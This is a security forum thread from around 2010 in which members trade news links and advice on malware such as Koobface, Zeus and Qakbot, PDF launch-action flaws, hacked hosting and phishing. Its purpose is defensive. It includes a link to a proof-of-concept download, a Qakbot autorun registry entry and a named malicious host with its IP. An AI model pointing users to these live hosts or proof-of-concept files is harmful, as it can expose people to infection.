http://www.infosecurity-magazine.com/view/8018/koobface-commandandcontrol-servers-double-in-48-hours/
* Be careful not to open links of in suspicious messages, even if the sender is a known
Facebook- friend.
* Use an up to date browser like: Google Chrome, Firefox 3.x, Internet Explorer 8, Opera 10, etc.
* Hand out minimal personal data, never give real address, telephone number or other private data.
* Keep your anti-malware software up-to-date to protect against new variants of the malware
attacking your machine. Users on XP can use System Restore to restore to a situation
before the infection occurred.
polonus
-
Secunia
Mozilla Confirms Critical Firefox Vulnerability
http://news.softpedia.com/news/Mozilla-Confirms-Critical-Firefox-Vulnerability-138014.shtml
-
Chinese Academics' Paper on Cyberwar Sets Off Alarm in U.S
http://www.nytimes.com/2010/03/21/world/asia/21grid.html
-
Hi malware fighters,
Malware found to redirect 400 anti-malware sites back to google IP via changed hosts file:
http://sunbeltblog.blogspot.com/2010/03/using-windows-hosts-file-to-cut-off.html
polonus
-
I'm one of the (probably) very few who doesn't bother with a hosts file as part of my defense system, so all I've got is the default Win file with just the single localhost entry. I do take a quick look at it as part of my weekly cleanup routine, but obviously it's very easy to spot any changes that way.
-
don't talk like that ;D Hostsfile utilities are still very useful for those running Internet Explorer ... on a more serious note, I don't bother with the hostsfile either, but I use Firefox ;)
ps: for those a bit lost here, IE has the ability to easily allow most site re-directions, while Firefox is protected against that.
-
I don't bother with the HOSTS file either ;D
There are a number of application that include Hosts file monitoring/locking/blocking, etc. I have WinPatrol Plus that monitors that in real time as one of its many monitoring functions, I think the free version only has monitoring at a set time period.
There are no doubt other such tools that do the same.
-
I would have thought protected hosts file was a quick and easy fix against intrusion by parasites, as the advertising says. Don't tell me I've gone fallen for a juicy header, after my many, many tirades against the advertisers,
-
Symantec names riskiest U.S. cities for cybercrime
http://www.computerworld.com/s/article/9173928/Symantec_names_riskiest_U.S._cities_for_cybercrime?taxonomyId=82
Is your city a cybercrime center?
http://www.networkworld.com/news/2010/032310-cybercrime-cities.html?page=1
Cyber criminals getting specialized, FBI says
http://fcw.com/articles/2010/03/23/web-fose-chabinsky-cyber-threat.aspx
Proposed US law would single out cybercrime havens
http://www.networkworld.com/news/2010/032310-proposed-us-law-would-single.html?hpg1=bn
-
***
Gmail starts warning users of suspicious account activity :
http://www.computerworld.com/s/article/9174044/Gmail_now_warns_users_of_suspicious_account_activity
http://gmailblog.blogspot.com/2010/03/detecting-suspicious-account-activity.html
***
-
Hacker Disables More Than 100 Cars Remotely
http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/
-
Hi malware fighters,
The main countries from where directed attacks are being performed are China and Romania, USA is in third position. Most dangerous are those e-mails that come with an encrypted RAR.file attached: http://www.messagelabs.com/mlireport/MLI_2010_03_Mar_FINAL-EN.pdf
polonus
-
Hacker gets 20 years in credit card thefts ....... :D
http://www.msnbc.msn.com/id/36039784/ns/us_news-crime_and_courts/
-
Hi malware fighters,
Apparent Detecting and Defeating Government Interception Attacks Against SSL, Certification authorities have provided government with false certifications so they need not break and can easily circumvent encryption: http://files.cloudprivacy.net/ssl-mitm.pdf
Involved is packet-forensics: http://www.wired.com/threatlevel/2010/03/packet-forensics
Now we understand why a lot of browsers trust a lot of certificates:
http://www.eff.org/deeplinks/2010/03/researchers-reveal-likelihood-governments-fake-ssl]
polonus
-
Hi malware fighters,
Apparent Detecting and Defeating Government Interception Attacks Against SSL, Certification authorities have provided government with false certifications so they need not break and can easily circumvent encryption: http://files.cloudprivacy.net/ssl-mitm.pdf
Involved is packet-forensics: http://www.wired.com/threatlevel/2010/03/packet-forensics
Now we understand why a lot of browsers trust a lot of certificates:
http://www.eff.org/deeplinks/2010/03/researchers-reveal-likelihood-governments-fake-ssl]
polonus
I hope that's not true ??? :o
-
@Logos,
More links: http://www.betanews.com/article/Has-SSL-become-pointless-Researchers-suspect-statesponsored-CA-forgery/1269551694
http://betabubble.com/?tag=intermediate-certificates
It was not developed with your security in mind....
It is all about endpoints, and it is all about trust to what is going over the "wire"......
DNSSEC has a similar attack against it,
polonus
-
I trust the sources, that's not the problem, I was just a bit shocked to say the least. I posted that on Comodo forums to get some reactions (could be interesting as they're in ssl business) but no feedback so far...
-
Trojans masquerading as updates for popular applications such as Adobe, Java or Windows.
I read this on Sunbelt blog
http://sunbeltblog.blogspot.com/2010/03/fake-updates-install-backdoors.html (http://sunbeltblog.blogspot.com/2010/03/fake-updates-install-backdoors.html)
Also more info on Softpedia
http://news.softpedia.com/news/Trojan-Masquerades-as-Adobe-Reader-Updater-Component-138453.shtml (http://news.softpedia.com/news/Trojan-Masquerades-as-Adobe-Reader-Updater-Component-138453.shtml)
Edited wrong Link
-
Hi malware fighters,
Security researcher D. Stevens has published a hole in PDF that cannot be patched!
POC: http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
Forewarned is forearmed. Adobe is putting everyone in danger,
polonus
-
I now use Foxit - regardless that is less supported PDF platform
-
I use sumatra pdf. recommended by scott, its awesome. Thanks scott. No problems whatsoever.
nmb
-
okay I give it a go. no doubt still recommended by Scott.
-
I use both foxit and Sumatra as they both come in portable versions (portableapps.com)
Simple, small, lightweight, and crucially not targeted as much as adobe ;D
-
Thats what I'll do Scott. And the portable on my flash drive as well. Cheers, buddy.
-
Hi malware fighters Scott and mkis,
Thanks for the additional info, forum friends, Adobe has been under malware flak too long now and their patch cycle cannot keep up with what is uncoming, as this cannot be patched as Didier Stevens mentions then it is better to shun Adobe's PDF software until they really will clean up their act,
polonus
-
OK this is all interesting, and I (seriously) don't doubt a second about the existence of Adobe Reader or Flash vulnerabilities. This said, I'm still waiting for my first Adobe related infection ;D
-
My personal third-party choice is Tracker's PDF-XChange Viewer (freeware, at least the version I've got).
If I understand correctly, the vulnerability is in Adobe's reader itself, rather than anything inherent in PDF coding, so 3rd party viewers should be OK.
I suspect Adobe has a general attitude problem about proper security. Maybe my sense of what happened when is a little fuzzy, but didn't all the problems with Flash start more or less when Adobe took that (and Shockwave generally) over?
-
Hi Logos,
The case is worse than the responders thought, it is not only Adobe PDF that is holed, it is all PDF, in Foxit it is even worse that you get no warning and still the POC works. Use this to test: http://didierstevens.com/files/data/launch-action-cmd.zip If cmd.exe is started well :'(
It is broken, folks, it is broken, they are going for broke!!! This is the POC for Foxit Reader: http://twitter.com/riotz/status/11281340909
But PDF-XChange Viewer still standing, nothing being executed only thing you get is an error after the warning....
polonus
-
yeah, sounds like it's the pdf (native structure) itself responsible for this possible threat >>> embedded virus contained in the document, not even using a security flaw. There's nothing Adobe can do against that. It's normally up to the user to be careful and avoid clicking, as long as a dialog box is displayed... but this can be controlled too according to the author of that article... I guess many other types of documents could be infected in a similar way. That's life, that's where you browse and how you browse. Legit sites don't spread such stuff, unless a site has been hacked...and I guess this sort of malware is absolutely undetectable by any AV...(may be if full file scan is selected, not sure...)
-
Hi Logos,
It won't work in FoxitReader when you will patch it, by taking support for url, launch, movie en sound out of the Reader,
polonus
-
Hi forum members,
Did you install the emergency patch for IE?; re: http://www.dshield.org/diary.html?storyid=8533
I did,
polonus
-
Hi forum members,
Did you install the emergency patch for IE?; re: http://www.dshield.org/diary.html?storyid=8533
I did,
polonus
Isn't this covered in the various updates that have already been installed with auto update by MS ???
-
Hi forum members,
Did you install the emergency patch for IE?; re: http://www.dshield.org/diary.html?storyid=8533
I did,
polonus
Isn't this covered in the various updates that have already been installed with auto update by MS ???
yep, it's just that ;)
http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx
-
Hi forum members,
Did you install the emergency patch for IE?; re: http://www.dshield.org/diary.html?storyid=8533
I did,
polonus
Isn't this covered in the various updates that have already been installed with auto update by MS ???
yep, it's just that ;)
http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx
Mine updated this morning with a greeting to reboot now or in 15 min. :)
More info here (http://blogs.zdnet.com/security/?p=5921&tag=nl.e539)
-
Here's mine - come through yesterday when I powered on the computer
http://www.microsoft.com/security/updates/bulletins/201003_oob.aspx
The other entry for 31 /3 /10 is an optional Compatibility View tweak with market by market functionality
I ran a check through the optional updates after the auto updates had downloaded and before I restarted.
I install a lot of the optional updates - this time I also loaded the .NET optionals, since I have .NET on my system
-
Mine updated this morning with a greeting to reboot now or in 15 min. :)
My XP Pro system installed Cumulative Security Update for Internet Explorer 8 for Windows XP (KB980182) when I powered it off about midnight and my Windows 7 system updated just now when I went to Windows Update and it indicated an Important update was available.
-
Hi YoKenny,
Because they had experienced the exploit being abused in the wild and they could not wait any longer with a patch. There was a Fix-It for it already, but that now has been turned into a general patch for the various IE versions,
polonus
-
Hi malware fighters,
Foxit Reader will patch the unpatchable hole next week: http://forums.foxitsoftware.com/showthread.php?p=41323
Good news,
pol
-
Hi malware fighters,
The Torpig aka Sinowal, malware will put obfuscated malicious JavaScript into a website's pages and/or JavaScript files. The malcode on the website's pages and JavaScript files is being changed from time to time and might be removed completely as well. The malware gets onto the website through FTP compromised credentials through malware located on a nachine that has accessed the site throughFTP. To prevent the website from being reinfected change the FTP password ^remove the malware from the infected machines before it will be use over and over again to access the website through FTP
FTP. Re: http://www.sophos.com/security/analyses/viruses-and-spyware/trojtorpigbl.html
The most recent script format is attached as a screendump (source: WhiteFirDesign)
Click to make more visable - pol
-
Firefox 3.6.3 fixes a critical security issue that could potentially allow remote code execution... More info here:
http://www.mozilla.org/security/announce/2010/mfsa2010-25.html
-
Exploits not needed to attack via PDF files
http://news.cnet.com/8301-27080_3-20001792-245.html
-
DHS studying global response to Conficker botnet
The Conficker Working Group report could provide a template for future cyber attack responses, security experts say
http://www.infoworld.com/d/security-central/dhs-studying-global-response-conficker-botnet-127
-
Hi malware fighters,
PONDUS can you give this in English?
New JAVA malware misleads av scanners: http://www.idg.no/computerworld/tema/sikkerhet/article163040.ece
Also: http://www.woodmann.com/forum/archive/index.php/t-13454.html
pol
-
Hackers spam out malware disguised as "account notification" warning
http://www.sophos.com/blogs/gc/g/2010/04/06/account-notification-email
Emails claiming that recipient's accounts have been temporarily suspended are being seen around the world today, attempting to trick users into believing that their email account has been accessed by somebody else. Ensure that your computer systems are protected and find out more now.
-
No change here other than perhaps Sophos trying to gain some kudos for something that has been going on for ages, not just happened/happening today.
-
They do say that it is a 'tried and trusted social engineering trick', and I think the point of the article is that the ruse targets those returning from the Easter break. Perhaps the same scam went down in previous Easter breaks. I cannot recall. I guess they have to report it anyway.
-
Mozilla warns of unknown root certificate authority in Firefox (http://blogs.zdnet.com/security/?p=6016&tag=nl.e589)
“…I have not been able to find the current owner of this root. Both RSA and VeriSign have stated in email that they do not own this root.
Therefore, to my knowledge this root has no current owner and no current audit, and should be removed from NSS.”
-
Mozilla warns of unknown root certificate authority in Firefox (http://blogs.zdnet.com/security/?p=6016&tag=nl.e589)
“…I have not been able to find the current owner of this root. Both RSA and VeriSign have stated in email that they do not own this root.
Therefore, to my knowledge this root has no current owner and no current audit, and should be removed from NSS.”
thanks for this warning; that's been updated, RSA is the owner but acknowledges that the certificate isn't in use anymore >>> so, it should be removed. It's this one: RSA Security 1024 V3. http://blog.mozilla.com/security/2010/04/06/removing-the-rsa-security-1024-v3-root/
-
Adobe suggests workaround for PDF embedded executable hack
http://blogs.zdnet.com/security/?p=6028&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+zdnet/security+(ZDNet+Zero+Day)
-
Report: Windows 7 holes eased by axing admin rights
http://news.cnet.com/8301-27080_3-20001359-245.html?tag=content;col1
-
Subscription to malware testing
The title may imply that this article is about subscription services for email checking ?
Rather not! This time we shall examine yet another way that criminal activity imitates legitimate business.
http://www.norman.com/security_center/security_center_archive/2010/79170/en-uk
-
MS Patch Tuesday heads-up: 25 holes in Windows, Office
Microsoft plans to release 11 security bulletins on Tuesday April 13, 2010 to fix 25 documented vulnerabilities that expose Windows users to remote code execution attacks.
http://blogs.zdnet.com/security/?p=6070&tag=nl.e540
-
1-in-10 Windows PCs still vulnerable to Conficker worm
http://www.computerworld.com/s/article/9174998/1_in_10_Windows_PCs_still_vulnerable_to_Conficker_worm?source=rss_news
Romanian police, FBI break up 70-strong eBay fraud ring
http://www.scmagazineus.com/romanian-police-fbi-break-up-70-strong-ebay-fraud-ring/article/167554/
http://garwarner.blogspot.com/2010/04/70-romanian-phishers-fraudsters.html
-
Hello everyone!
I'm new to this forum and to Avast. I'm not sure if I'm posting my query in the right thread, but here goes. I'd be grateful if someone could advise me on how to report a possible 'false positive' to Avast? I've been trying to enter a furniture website here in the UK, but I keep receiving a message from Avast telling me there is a Trojan horse file attached to the shopping cart, thus I always have to abort the connection.
I've telephoned and emailed the furniture company and they admit there was a problem, but they say they've now fixed it. Yet Avast continues to warn me not to enter the site.
Should I put the website url here for someone to check? I won't do this if it's against protocol on this forum. In short, I just need to know how to request a human being at Avast to check whether I'm receiving a false positive?
Thanks in advance for your advice :D
-
Reports related to detections, etc. should go in a new topic in the viruses and worms forum, http://forum.avast.com/index.php?board=4.0 (http://forum.avast.com/index.php?board=4.0). There you can post this information and the URL, change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.
-
Thanks, will do that. I've now reported the Trojan horse problem to Avast Technical support and hope they won't take too long to reply.
-
I would still go ahead with the new topic as the forums are very active.
-
Hi malware fighters,
More and more malware with destructive payload leave users with a non-functioning PC:
http://blog.webroot.com/2010/04/08/this-pc-will-self-destruct-in-ten-seconds/
polonus
-
sorry Logos, spammer was here but mod must have deleted them- next time I leave it to the mods :)
-
hmm...is yr biznus desperate or someting...surely better place to advertise than here?
???
-
Hi malware fighters,
WordPress bloggers being hacked with shared hosting from Network Solutions: http://wordpress.org/support/topic/385477/page/2#post-1470935
Here it is called a plug-in prob: http://krebsonsecurity.com/2010/04/hundreds-of-wordpress-blogs-hit-by-networkads-net-hack/
pol
-
I have an account at netsol so I will go in tonight and see if I can find anything amiss. I have the Wordpress options active (I think), but have never used them from what I can recall - why would, when I can have Wordpress as a standalone with sufficient options to link back to netsol, that is links that keep source at arm's length from destination. There have been a lot of problems with Wordpress recently. Cannot say people haven't had sufficient warnings. And Wordpress bundled into netsol...hmm...tonight I stop any active connect for good.
Netsol are unashamedly hard sell, even though they do provide me services at a tenth of the price what they would cost here in New Zealand (I'm not kidding - $NZ14 per annum spent at netsol for what I'm paying approx $NZ170 per annum here just to own a .co.nz domain, and that's not to use the domain, that's just to own it). But point is netsol are unashamedly hard sell, they exude business, and you have to watch yr *ss for yrself, cos they not going to do it for you. That said, their network shield is good, very solid so far, and I feel terribly let down that I haven't received an email notification about this issue. They do crank out emails very regular, hard sell emails that is, and there really is no excuse for the delay. A warning about the threats at least, should be mandatory. As a netsol customer I am terribly let down, and feel the negligence reflects on myself as well as one of their clients. (And just checked - still no email).
Edit - screenshot show Wordpress / mysql database - now removed
maybe I yapped my mouth a bit early ??? but I just know - I knew back then - at least the forum finally got something to talk about, usual its just a vehicle to advertise, better go add my piece of nonsense to the rabble ;D
Edit - I was wrong there was an alert - alerted that I've got a bill needs to be paid within 30 days ???
-
sorry Logos, spammer was here but mod must have deleted them- next time I leave it to the mods :)
oh OK ;)
-
More: http://blog.unmaskparasites.com/2010/04/11/network-solutions-and-wordpress-security-flaw/
-
thanks Scott, I feel vindicated. I've always felt that Wordpress / mysql option was a risk. but must be tempting for some people.
I'm trying to get into the forum discussion at the moment through my standalone Wordpress.
oh its wordpress.org and my standalone is wordpress.com - they operate separately - has saved me wasting my time.
here's an update on this issue
http://blog.networksolutions.com/2010/update-word-press-issue-fixed/ - fixed (for now)
http://terrywhite.com/techblog/archives/5097 - is tough at the top, Terry (some good tips and tricks on this domain)
Thanks for post Polonus, I've decided to RSS Brian Krebs as a safe measure - no onsite alert from netsol as yet ???
-
Scam Facebook page attracts 40,000 victims seeking Ikea gift card
http://www.computerworld.com/s/article/9175158/Scam_Facebook_page_attracts_40_000_victims_seeking_Ikea_gift_card?source=rss_news
Income tax season spawns Internet spammer scams
http://www.usatoday.com/money/industries/technology/2010-04-12-identitytheft12_ST_N.htm
-
Microsoft to fix 25 holes
http://news.cnet.com/8301-27080_3-20002053-245.html
-
Malware Extorts Cash From BitTorrent Users
A new type of malware is riding the wave of file-sharing pre-settlement letters by infecting BitTorrent users’ machines and then demanding payments in order to make imaginary lawsuits go away. ICPP Foundation try to give the impression they are RIAA and MPAA affiliated but the whole thing is a scam to extort cash and obtain credit card details.
http://torrentfreak.com/malware-extort-cash-from-bittorrent-users-100411/
-
Mozilla has blocklisted all older versions of the Java Deployment Toolkit plugin. I just noticed that the current version in my Java 6U20 installation is Java Deployment Toolkit 6.0.200.2, a version which is newer than those blocklisted, versions 6.0.200.0 and older.
Add-ons Blocklist | Mozilla (https://www.mozilla.com/en-US/blocklist/)
This page lists blocklisted add-ons that should no longer be used with Mozilla products.
...
* Java Deployment Toolkit, versions 6.0.200.0 and older. Reason: security vulnerabilities (see bug 558584 (https://bugzilla.mozilla.org/show_bug.cgi?id=558584)).
This note seems to say a problem is caused by the Java update process, rather than the 1.6.0_20 version of the plugin. I don't see any evidence that the 1.6.0_20 version is problematic.
US-CERT Vulnerability Note VU#886582 (http://www.kb.cert.org/vuls/id/886582)
Note: The installer for Java 1.6.0_20 may not correctly update all instances of the Java Deployment Toolkit plugin. In some cases, the plugin that resides in the \bin\new_plugin directory may not be updated to the fixed 6.0.200.2 version of npdeployJava1.dll. If the new_plugin directory contains npdeploytk.dll version 6.0.190.4 or earlier, then browsers that use plug-ins, such as Mozilla Firefox or Google Chrome, may still be vulnerable. To correct this situation, delete the vulnerable npdeploytk.dll from the new_plugin directory and replace it with the npdeployJava1.dll version from the bin directory.
Please note that the Java Development Toolkit can be installed in multiple browsers, therefore workarounds need to be applied to all browsers with the Java Development Toolkit.
Edit: Updated with US-CERT info.
Mozilla's Add-ons Blocklist page seems to have some incorrect info.
Current version is not blocklisted.
-
There may have been some problems Java update process, perhaps in updating to 1.6.0_20 version.
Chrome Java version
Where I found there was an issue - Vista SP2, Chrome - Secunia found the version to be out of date
- would not update from the Java module in Control Panel
- downloaded 1.6.20 version from Secunia but would not install
- repeat attempt bought up dialog box inform the elevation was necessary to update - special case
Also repeated attempts to change rule from Ask before downloading to Ask before installing was not successful after the rule had been Apply - always went back to initial setting - this is still the case.
- currently Ask before downloading is the only setting that will Apply
The owner of the computer is not computer literate so I did not pursue what was the brief history
- last attempt to update was 4/4/2010 and that was from 1.6.18 version....so? I'm not sure.
What I did was download the latest version and uninstall the existing version
- then I did an install of 1.6.20 and this was successful
- ran a manual update and process was successful returning message that Java already up to date
Still couldn't change update rule to Ask before install - may need to first change some other setting.
Edit - one of my own computers - XP Pro, Firefox - alerts that most recent update of Java console 1.6.18 in browser had not shed previous version, so I deleted previous version and tried manual update of Java in Control Panel - two corrupt downloads before successful install of 1.6.20 and checked browser to find that all was now good - will check all my machines, if any problems will open new post.
-
Infected XP owners left unpatched
Some of the latest security updates for Windows XP will not be installed on machines infected with a rootkit virus.
...
The latest updates can spot if a system is compromised by the Alureon rootkit and halt installation.
http://news.bbc.co.uk/1/hi/technology/8624560.stm
-
Network Solutions hacked again
More sites hacked : http://bit.ly/9a8nP2
nmb
-
More sites hacked : http://bit.ly/9a8nP2
Could you provide the full URL? In general, I'm not comfortable clicking on shortened ones because they give me no indication of where I'm supposed to wind up.
-
Sorry, that was from twitter.
Here it is : http://blog.sucuri.net/2010/04/network-solutions-hacked-again.html
nmb
-
Thank you for the link, nmb. Interesting stuff. Thank goodness for NoScript and Avast 5 -- and automatic browser and OS updates.
-
Yes I feel very good that I know about noscript and avast. Both are very efficient in blocking such hacks. Huge thanks to both of 'em.
nmb
-
More sites hacked : http://bit.ly/9a8nP2
Could you provide the full URL? In general, I'm not comfortable clicking on shortened ones because they give me no indication of where I'm supposed to wind up.
Maybe you need this little Firefox add-on:
http://www.lockergnome.com/bob3160/2010/04/14/the-long-and-short-of-urls/ (http://www.lockergnome.com/bob3160/2010/04/14/the-long-and-short-of-urls/)
-
:) google Chrome bookmark
-
More sites hacked : http://bit.ly/9a8nP2
Could you provide the full URL? In general, I'm not comfortable clicking on shortened ones because they give me no indication of where I'm supposed to wind up.
Maybe you need this little Firefox add-on:
http://www.lockergnome.com/bob3160/2010/04/14/the-long-and-short-of-urls/ (http://www.lockergnome.com/bob3160/2010/04/14/the-long-and-short-of-urls/)
That little add-on is reported as only for old versions of firefox when you get to Mozilla's add-ons section and no link to download the .xpi file. It hasn't been updated for some time and not offered for firefox 3.6.3.
-
Hi malware fighters,
Well Trojan now posing as a GoogleChrome extension:
http://www.malwarecity.com/blog/trojan-as-fake-google-chrome-extension-797.html
polonus
-
Network Solutions customers hit by mass hack attack
http://www.theregister.co.uk/2010/04/19/network_solutions_mass_hack/
Network Solutions' security team is battling a mysterious attack that has silently infected a "huge" number of the websites it hosts with malicious code.
The mass compromise affects sites running WordPress, Joomla, and plain-vanilla HTML, according to reports here and here from Securi Security and Stop Malvertising. Many of the infected sites include encoded javascript that secretly attempts to install malware on visitors' computers.
>>> Firefox + NS ;D
-
Hi malware fighters,
A solution for the XSS filter problem in IE8 will be launched next patch round:
http://blogs.technet.com/msrc/archive/2010/04/19/guidance-on-internet-explorer-xss-filter.aspx
polonus
-
1.5M stolen Facebook IDs up for sale
http://www.computerworld.com/s/article/9175936/1.5M_stolen_Facebook_IDs_up_for_sale?source=rss_internet
IDG News Service - A hacker named Kirllos has a rare deal for anyone who wants to spam, steal or scam on Facebook: an unprecedented number of user accounts offered at rock-bottom prices.
Researchers at VeriSign's iDefense group recently spotted Kirllos selling Facebook user names and passwords in an underground hacker forum, but what really caught their attention was the volume of credentials he had for sale: 1.5 million accounts.
IDefense doesn't know if Kirllos' accounts are legitimate, and Facebook didn't respond to messages Thursday seeking comment. If they are legitimate, he has the account information of about one in every 300 Facebook users. His asking price varies from $25 to $45 per 1,000 accounts, depending on the number of contacts each user has.
To date, Kirllos seems to have sold close to 700,000 accounts, according to VeriSign Director of Cyber Intelligence Rick Howard.
social networks ::)
-
Hi malware fighters,
Now also Fx is vulnerable to the newest Zeus version via HTML injection: http://www.scmagazineus.com/new-zeus-version-targeting-firefox-users-for-bank-fraud/article/168455/
polonus
-
Emerging threat reported by Symantec UK:
1100 UK Health Service machines infected with Qakbot:
http://www.symantec.com/connect/de/blogs/qakbot-steals-2gb-confidential-data-week
pol
P.S. Manual removal instructions:
1. Temporarily Disable System Restore (Windows Me/XP).
2. Update the virus definitions.
3. Reboot computer in SafeMode
4. Run a full system scan and clean/delete all infected files
5. Delete/Modify any values added to the registry.
Navigate to and delete the following registry entry:
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrent VersionRun”[LEGITIMATE APPLICATION NAME]” = “”C:Documents And SettingsAll Users_qbothome_qbotinj.exe” “C:Documents And SettingsAll Users_qbothome_qbot.dll” /c [PATH TO LEGITIMATE APPLICATION]”
6. Exit registry editor and restart the computer.
7. In order to make sure that threat is completely eliminated from your computer, carry out a full scan of your computer using Avast AntiVirus and Antispyware Software like MBAM and SAS,
Damian
-
This could be an extensive threat:
http://www.enterprise-security-today.com/story.xhtml?story_id=112003V2043K&page=1&full_skip=1
polonus
-
Hi :)
Mcafee update shutting down Xp machines.- http://www.engadget.com/2010/04/21/mcafee-update--shutting-down-xp-machines/
Have a nice day. :)
-
Blippy users' credit card info exposed on Google - http://news.cnet.com/8301-27080_3-20003283-245.html?tag=mncol;title
-
Now also Fx is vulnerable to the newest Zeus version via HTML injection: http://www.scmagazineus.com/new-zeus-version-targeting-firefox-users-for-bank-fraud/article/168455/
It's good to know that Zeus isn't transmitted by a Firefox vulnerability. But once you've got it, even Firefox won't save you. Will Avast 5 block this new variant of Zeus?
http://www.scmagazineus.com/new-zeus-version-targeting-firefox-users-for-bank-fraud/article/168455/
In an email sent to SCMagazineUS.com on Wednesday, a spokesperson at Mozilla said that Zeus is not exploiting a vulnerability within Firefox, but is installed once a system has already been compromised.
"Once malware like Zeus is on a user's system, every application they use is at risk," the Mozilla spokesperson said.
Previous versions of Zeus had fairly limited capabilities for Firefox compared to those for Microsoft's Internet Explorer (IE) browser, Boodaei said. On Firefox, for example, the trojan previously was not capable of changing a bank's login page or altering a user's online transactions. As a result, most fraud incidents associated with Zeus have been sustained by users of IE.
-
Hi malware fighters,
Ongoing Twitter Support spam campaign
http://news.softpedia.com/newsImage/Email-Spam-Run-Impersonates-Twitter-Support-Staff-3.jpg/
polonus
-
Not sure if this email was part of a spam campaign - profile of the sender was suspended a few hours later.
I did take the email as genuine, if perhaps a lttle bent -
did take me to Twitter, where the sender was following my tweets
sender only had three entries, one of which directed the viewer to 'meet the locals', most of whom were showing themselves off in various stages of undress, down to no dress at all. Including the sender I gather, but a girl was visiting at the time, and she informed me that this person - the sender - was not for me at all. :)
And later, the sender's profile was suspended (does that mean withdrawn possibly?). But I think genuine Twitter
btw - I was on Firefox at the time, but the redirects to 'meet the locals' can still be found in my Chrome history (records all browsers), and they are still 'live', are they are showing the links to be local.
-
Sunbelt Software and Malwarebytes Partner to Improve the Security of the Internet
http://www.sunbeltsoftware.com/Press/Releases/?id=346
http://vipre.malwarebytes.org/
-
Symantec Global Internet Security Threat Report (2009) pdf
http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xv_04-2010.en-us.pdf
-
Hi malware fighters,
The blippy service leaked creditcard data to be found on Google: http://venturebeat.com/2010/04/23/blippy-credit-card-citibank/
Be aware with whom you share confidential data...
polonus
-
Not sure whether this has been posted yet. But here goes -
Virus Bulletin - Latest Reactive and Proactive (RAP) test results
http://www.virusbtn.com/index
Efforts to perceptual map prevalence of virus and virus detection
http://docs.google.com/View?id=ah85g3kzb4tn_274cx84gggh
(I don't readily agree with their perception, but I do like Virus Bulletin)
-
Users' passwords exposed by Splunk
http://www.theregister.co.uk/2010/04/26/splunk_passwords_revealed/
Splunk, a kind of Google for business technology that boasts it can help reinforce your security, has exposed the details of major customers to hackers following a web site slip up.
The passwords of customers on Splunk.com were revealed after some debug information leaked on to its production servers. The debug code exposed users passwords to Splunk.com as clear text, the company said. The site contained the emails and user names customers had used to register with Spluk.
-
Bitdefender warns of malware targeting iPad
http://news.bitdefender.com/NW1497-en--BitDefender-Warns-of-Malware-Targeting-iPad-Users-via-iTunes-Update.html
-
Secunia - Vulnerabilities vs. attack vectors...
http://secunia.com/blog/97
-
Hi malware fighters,
First attempt to launch malcode from within PDF-file without the use of JS:
http://secshoggoth.blogspot.com/2010/04/launch-malicious-pdf.html
There is more to come, be aware...
pol
-
ALL photocopied documents are stored on a hard drive within a hard drive in the photocopier...Potential Risk for information leaks...
:o :o :o :o :o
http://www.cbsnews.com/stories/2010/04/19/eveningnews/main6412439.shtml
Wow, never even knew about this...
-
ALL photocopied documents are stored on a hard drive within a hard drive in the photocopier...Potential Risk for information leaks...
:o :o :o :o :o
http://www.cbsnews.com/stories/2010/04/19/eveningnews/main6412439.shtml
Wow, never even knew about this...
The most important information there:
How Bullock Kept Her Baby Adoption Secret
http://www.cbsnews.com/stories/2010/04/29/earlyshow/leisure/celebspot/main6443520.shtml?tag=strip
-
India now the primary producer of viruses
I feel bad : http://www.net-security.org/malware_news.php?id=1320 :( >:(
Avast! guys.. you got a bot in India?
nmb
-
From Windows Secrets - Upgrade to IE8 Now, or Face Consequences
http://www.infopackets.com/news/business/microsoft/2010/20100331_experts_urge_upgrade_to_ie8_now_or_face_consequences.htm
-
Hi malware fighters,
Underforge of Lack - R.I.P. Just security prevent everything!
Occasionally have a look here for recent threats: http://www.underforge.net/category/security/
example malicious site xorg*pl
for this threat (we had it in the mailcious websites in virus and worms): www3.workfree36-td.xorg★pl as 95.169.186.25
with Diagnostic pages like this: http://www.google.com/safebrowsing/diagnostic?site=AS:31103
and this http://www.robtex.com/route/95.169.160.0-19.html
Damian
-
Hi malware fighters,
Just to keep a quick check on infested websites via Norton Safe Web, Safety and Threats:
http://forum.avast.com/index.php?topic=59287.msg499672#msg499672
polonus
-
Hi malware fighters,
As this was issued, new zbot infects through PDF file, avast did not detect this:
http://securitylabs.websense.com/content/Alerts/3593.aspx
polonus
-
US Air Force phishing test transforms into a problem ;D
http://www.computerworld.com/s/article/9176155/US_Air_Force_phishing_test_transforms_into_a_problem?taxonomyId=13&pageNumber=1
-
US Air Force phishing test transforms into a problem ;D
http://www.computerworld.com/s/article/9176155/US_Air_Force_phishing_test_transforms_into_a_problem?taxonomyId=13&pageNumber=1
File this under:
military intelligence
http://www.oxymoronlist.com/military-intelligence
-
'Extremely severe' flaw in Opera web browser
An “extremely severe” security vulnerability in the Opera browser could put web surfers at risk of remote code execution attacks, the software maker warned today.
http://blogs.zdnet.com/security/?p=6355&tag=nl.e589
The vulnerability, now patched with the new Opera 10.53, affects Opera for Windows and Mac.
-
Hi malware fighters,
Current threats Malware Database - iFrames and Rogue AV hacks: http://malwaredatabase.net/blog/
Current malicious websites reported: http://safeweb.norton.com/safety
polonus
-
Facebook's New Features Secretly Add Apps to Your Profile
http://www.pcworld.com/businesscenter/article/195728/facebooks_new_features_secretly_add_apps_to_your_profile.html
When a piece of software is automatically installed on your computer without your knowledge, it's called malware. But what do you call it when Facebook apps are added to your profile without your knowledge? We discovered Wednesday that this is actually happening, and stopping it isn't as easy as checking a box in your privacy settings.
If you visit certain sites while logged in to Facebook, an app for those sites will be quietly added to your Facebook profile. You don't have to have a Facebook window open, you don't need to be signed in to these sites for the apps to appear, there's no notification, and there doesn't appear to be an option to opt-out anywhere in Facebook's byzantine privacy settings.
-
Fake HSBC emails...
OK, so I got one today that was supposedly from them.
It says that I need to verify some account details, and gives what looks to be a genuine link.
There are some things to note though...
1. It is addressed to my email account, not my name...'Dear abcd@abcd.com...' (not how it would be done if it was really HSBC)
2. I have NEVER banked with HSBC...
These things alone are indicative of a scam email...
Another tell tale sign that it is bad, is that the link doesn't actually go to where it says it goes...
